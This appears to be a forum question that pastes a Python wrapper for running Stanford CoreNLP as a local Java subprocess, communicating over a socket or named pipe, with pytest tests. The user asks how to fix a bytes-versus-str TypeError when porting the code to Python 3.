self.kill_proc_if_running()
if self.comm_mode=='PIPE':
if not os.path.exists(self.outpipe):
os.mkfifo(self.outpipe)
cmd = command(**self.__dict__)
LOG.info("Starting java subprocess, and waiting for signal it's ready, with command: %s" % cmd)
self.proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
time.sleep(STARTUP_BUSY_WAIT_INTERVAL_SEC)
if self.comm_mode=='SOCKET':
sock = self.get_socket(num_retries=100, retry_interval=STARTUP_BUSY_WAIT_INTERVAL_SEC)
sock.close()
elif self.comm_mode=='PIPE':
self.outpipe_fp = open(self.outpipe, 'r')
while True:
# This loop is for if you have timeouts for the socket connection
# The pipe system doesn't have timeouts, so this should run only
# once in that case.
try:
ret = self.send_command_and_parse_result('PING\t""', 2)
if ret is None:
continue
assert ret == "PONG", "Bad return data on startup ping: " + ret
LOG.info("Successful ping. The server has started.")
break
except socket.error as e:
LOG.info("Waiting for startup: ping got exception: %s %s" % (type(e), e))
LOG.info("pausing before retry")
time.sleep(STARTUP_BUSY_WAIT_INTERVAL_SEC)
LOG.info("Subprocess is ready.")
def ensure_proc_is_running(self):
if self.proc is None:
# Has never been started
self.start_server()
elif self.proc.poll() is not None:
# Restart
self.start_server()
def kill_proc_if_running(self):
if self.proc is None:
# it's never been started yet
return
retcode = self.proc.poll()
if retcode is not None:
LOG.info("Subprocess seems to be stopped, exit code %s" % retcode)
elif retcode is None:
LOG.warning("Killing subprocess %s" % self.proc.pid)
os.kill(self.proc.pid, 9)
def parse_doc(self, text, timeout=PARSEDOC_TIMEOUT_SEC, raw=False):
cmd = "PARSEDOC\t%s" % json.dumps(text)
return self.send_command_and_parse_result(cmd, timeout, raw=raw)
def get_socket(self, num_retries=1, retry_interval=1):
# could be smarter here about reusing the same socket?
for trial in range(num_retries):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # not sure if this is needed?
sock.connect(('localhost', self.server_port))
return sock
except (socket.error, socket.timeout) as e:
LOG.info("socket error when making connection (%s)" % e)
if trial < num_retries-1:
LOG.info("pausing before retry")
time.sleep(retry_interval)
assert False, "couldnt connect socket"
def send_command_and_parse_result(self, cmd, timeout, raw=False):
try:
self.ensure_proc_is_running()
data = self.send_command_and_get_string_result(cmd, timeout)
if data is None: return None
decoded = None
if raw:
return data
try:
decoded = json.loads(data)
except ValueError:
LOG.warning("Bad JSON returned from subprocess; returning null.")
LOG.warning("Bad JSON length %d, starts with: %s" % (len(data), repr(data[:1000])))
return None
return decoded
except socket.timeout as e:
LOG.info("Socket timeout happened, returning None: %s %s" % (type(e), e))
return None
# This is tricky. maybe the process is running smoothly but just
# taking longer than we like. if it's in thie state, and we try to
# send another command, what happens? Should we forcibly restart
# the process now just in case?
def send_command_and_get_string_result(self, cmd, timeout):
if self.comm_mode == 'SOCKET':
sock = self.get_socket(num_retries=100)
sock.settimeout(timeout)
sock.sendall(cmd + "\n")
size_info_str = sock.recv(8)
elif self.comm_mode == 'PIPE':
self.proc.stdin.write(cmd + "\n")
self.proc.stdin.flush()
size_info_str = self.outpipe_fp.read(8)
# java "long" is 8 bytes, which python struct calls "long long".
# java default byte ordering is big-endian.
size_info = struct.unpack('>Q', size_info_str)[0]
# print "size expected", size_info
chunks = []
curlen = lambda: sum(len(x) for x in chunks)
while True:
remaining_size = size_info - curlen()
if self.comm_mode == 'SOCKET':
data = sock.recv(remaining_size)
elif self.comm_mode == 'PIPE':
data = self.outpipe_fp.read(remaining_size)
chunks.append(data)
if curlen() >= size_info: break
if len(chunks) > 1000:
LOG.warning("Incomplete value from server")
return None
time.sleep(0.01)
return ''.join(chunks)
def test_modes():
import pytest
gosimple(comm_mode='SOCKET')
gosimple(comm_mode='PIPE')
with pytest.raises(AssertionError):
gosimple(comm_mode=None)
with pytest.raises(AssertionError):
gosimple(comm_mode='asdfasdf')
def test_coref():
assert_no_java("no java when starting")
p = CoreNLP("coref")
ret = p.parse_doc("I saw Fred. He saw me.")
pprint(ret)
assert 'entities' in ret
assert isinstance(ret['entities'], list)
def gosimple(**kwargs):
assert_no_java("no java when starting")
p = CoreNLP("ssplit", **kwargs)
ret = p.parse_doc("Hello world.")
# pprint(ret)
assert len(ret['sentences']) == 1
assert ' '.join(ret['sentences'][0]['tokens']) == "Hello world ."
p.kill_proc_if_running()
assert_no_java()
def test_paths():
import pytest
with pytest.raises(AssertionError):
CoreNLP("ssplit", corenlp_jars=["/asdfadsf/asdfasdf"])
def assert_no_java(msg=""):
ps_output = os.popen("ps wux").readlines()
javalines = [x for x in ps_output if re.search(r'\bbin/java\b', x)]
print(''.join(javalines))
assert len(javalines) == 0, msg
# def test_doctimeout():
# assert_no_java("no java when starting")
#
# p = CoreNLP("pos")
# ret = p.parse_doc(open("allbrown.txt").read(), 0.5)
# assert ret is None
# p.kill_proc_if_running()
# assert_no_java()
if __name__=='__main__':
import sys
if sys.argv[1]=='modes':
for mode,d in MODES_items:
print(" * `%s`: %s" % (mode, d['description']))
if sys.argv[1]=='modes_json':
# import json as stdjson
# print stdjson.dumps(MODES, indent=4)
print('"%s"' % json.dumps(MODES).replace('"', r'\"'))
However, I still get an error at
byteself.proc.stdin.write(cmd + "\n")
TypeError: a bytes-like object is required, not 'str'
I know it has to do with encoding and I may have to use encode/decode at a few places where it reads/writes but since I have not worked with sockets a lot, I am not sure where to change.

Categories